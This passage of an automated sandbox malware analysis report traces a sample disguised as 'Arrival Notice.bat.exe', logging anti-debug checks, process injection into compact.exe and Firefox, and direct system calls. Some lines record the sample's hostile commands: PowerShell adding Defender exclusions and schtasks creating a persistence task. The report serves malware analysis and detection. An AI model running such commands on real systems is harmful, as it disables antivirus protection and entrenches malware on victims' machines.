              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A6620 mov eax, dword ptr fs:[00000030h]8_2_015A6620
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8620 mov eax, dword ptr fs:[00000030h]8_2_015A8620
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157262C mov eax, dword ptr fs:[00000030h]8_2_0157262C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E627 mov eax, dword ptr fs:[00000030h]8_2_0158E627
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA6C7 mov ebx, dword ptr fs:[00000030h]8_2_015AA6C7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA6C7 mov eax, dword ptr fs:[00000030h]8_2_015AA6C7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE6F2 mov eax, dword ptr fs:[00000030h]8_2_015EE6F2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F06F1 mov eax, dword ptr fs:[00000030h]8_2_015F06F1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F06F1 mov eax, dword ptr fs:[00000030h]8_2_015F06F1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574690 mov eax, dword ptr fs:[00000030h]8_2_01574690
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574690 mov eax, dword ptr fs:[00000030h]8_2_01574690
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A66B0 mov eax, dword ptr fs:[00000030h]8_2_015A66B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC6A6 mov eax, dword ptr fs:[00000030h]8_2_015AC6A6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F0946 mov eax, dword ptr fs:[00000030h]8_2_015F0946
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01614978 mov eax, dword ptr fs:[00000030h]8_2_01614978
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01614978 mov eax, dword ptr fs:[00000030h]8_2_01614978
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC97C mov eax, dword ptr fs:[00000030h]8_2_015FC97C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644940 mov eax, dword ptr fs:[00000030h]8_2_01644940
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E mov eax, dword ptr fs:[00000030h]8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E mov edx, dword ptr fs:[00000030h]8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E mov eax, dword ptr fs:[00000030h]8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01596962 mov eax, dword ptr fs:[00000030h]8_2_01596962
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01596962 mov eax, dword ptr fs:[00000030h]8_2_01596962
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01596962 mov eax, dword ptr fs:[00000030h]8_2_01596962
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0160892B mov eax, dword ptr fs:[00000030h]8_2_0160892B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC912 mov eax, dword ptr fs:[00000030h]8_2_015FC912
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568918 mov eax, dword ptr fs:[00000030h]8_2_01568918
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568918 mov eax, dword ptr fs:[00000030h]8_2_01568918
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE908 mov eax, dword ptr fs:[00000030h]8_2_015EE908
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE908 mov eax, dword ptr fs:[00000030h]8_2_015EE908
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F892A mov eax, dword ptr fs:[00000030h]8_2_015F892A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A9D0 mov eax, dword ptr fs:[00000030h]8_2_0157A9D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A49D0 mov eax, dword ptr fs:[00000030h]8_2_015A49D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016069C0 mov eax, dword ptr fs:[00000030h]8_2_016069C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A29F9 mov eax, dword ptr fs:[00000030h]8_2_015A29F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A29F9 mov eax, dword ptr fs:[00000030h]8_2_015A29F9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163A9D3 mov eax, dword ptr fs:[00000030h]8_2_0163A9D3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE9E0 mov eax, dword ptr fs:[00000030h]8_2_015FE9E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F89B3 mov esi, dword ptr fs:[00000030h]8_2_015F89B3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F89B3 mov eax, dword ptr fs:[00000030h]8_2_015F89B3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F89B3 mov eax, dword ptr fs:[00000030h]8_2_015F89B3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A0 mov eax, dword ptr fs:[00000030h]8_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015709AD mov eax, dword ptr fs:[00000030h]8_2_015709AD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015709AD mov eax, dword ptr fs:[00000030h]8_2_015709AD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574859 mov eax, dword ptr fs:[00000030h]8_2_01574859
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574859 mov eax, dword ptr fs:[00000030h]8_2_01574859
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A0854 mov eax, dword ptr fs:[00000030h]8_2_015A0854
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtOpenKeyEx: Direct from: 0x76F03C9C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtCreateKey: Direct from: 0x76F02C6C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtSetInformationThread: Direct from: 0x76F02B4C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtQuerySystemInformation: Direct from: 0x76F048CC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtOpenSection: Direct from: 0x76F02E0C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtQueryValueKey: Direct from: 0x76F02BEC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtCreateFile: Direct from: 0x76F02FEC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtOpenFile: Direct from: 0x76F02DCC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtSetInformationThread: Direct from: 0x76F02ECC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtQueryInformationToken: Direct from: 0x76F02CAC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtTerminateThread: Direct from: 0x76F02FCC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtOpenKeyEx: Direct from: 0x76F02B9C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtSetInformationProcess: Direct from: 0x76F02C5C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtCreateMutant: Direct from: 0x76F035CC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtMapViewOfSection: Direct from: 0x76F02D1C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtResumeThread: Direct from: 0x76F036AC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtReadFile: Direct from: 0x76F02ADC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtDelayExecution: Direct from: 0x76F02DDC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtQueryInformationProcess: Direct from: 0x76F02C26
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtResumeThread: Direct from: 0x76F02FBC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe NtCreateUserProcess: Direct from: 0x76F0371C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory written: C:\Users\user\Desktop\Arrival Notice.bat.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Memory written: C:\Users\user\AppData\Local\Temp\-6qxw.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Section loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: read write
              Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Section loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and write
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\-6qxw.exe protection: execute and read and write
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: read write
              Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\compact.exe Thread register set: target process: 7332
              Source: C:\Windows\SysWOW64\runonce.exe Thread register set: target process: 7668
              Source: C:\Windows\SysWOW64\compact.exe Thread APC queued: target process: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Process created: C:\Users\user\Desktop\Arrival Notice.bat.exe "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp"
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Process created: C:\Users\user\AppData\Roaming\dLrZsz.exe "C:\Users\user\AppData\Roaming\dLrZsz.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
              Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Process created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
              Source: C:\Windows\SysWOW64\runonce.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
